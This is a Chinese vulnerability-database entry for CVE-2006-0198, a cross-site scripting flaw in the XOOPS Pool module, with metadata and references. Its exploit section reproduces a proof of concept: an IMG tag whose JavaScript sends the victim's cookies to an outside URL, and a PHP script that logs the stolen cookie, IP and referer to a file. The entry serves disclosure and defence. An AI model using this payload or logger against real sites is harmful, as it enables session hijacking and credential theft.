Xoops 跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109602 漏洞类型 跨站脚本
发布时间 2006-01-09 更新时间 2006-01-17
CVE编号 CVE-2006-0198 CNNVD-ID CNNVD-200601-138
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/27059
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200601-138
|漏洞详情
XOOPS的特定模块(可能是轮询或存储池模块)中存在跨站脚本攻击(XSS)漏洞,远程攻击者可以通过评论中的IMG元素的SRC属性中的JavaScript注入任意Web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/16189/info

The XOOPS Pool Module is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.

Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible. 

<img src="javascript:window.navigate('http://www.example.com/cookies.php?c='+document.cookie);"

cookies.php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('steal.php', 'a');
fwrite($fp, '
Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.' ');
fclose($fp);
?>
|参考资料

来源:MISC
链接:http://www.xoops.org/modules/newbb/viewtopic.php?topic_id=45637&forum=2&post_id=200481
来源:BID
名称:16189
链接:http://www.securityfocus.com/bid/16189
来源:BUGTRAQ
名称:20060107XoopsPoolModuleIMGTagCrossSiteScripting
链接:http://www.securityfocus.com/archive/1/archive/1/421325/100/0/threaded
来源:XF
名称:xoops-pool-imagetag-xss(24091)
链接:http://xforce.iss.net/xforce/xfdb/24091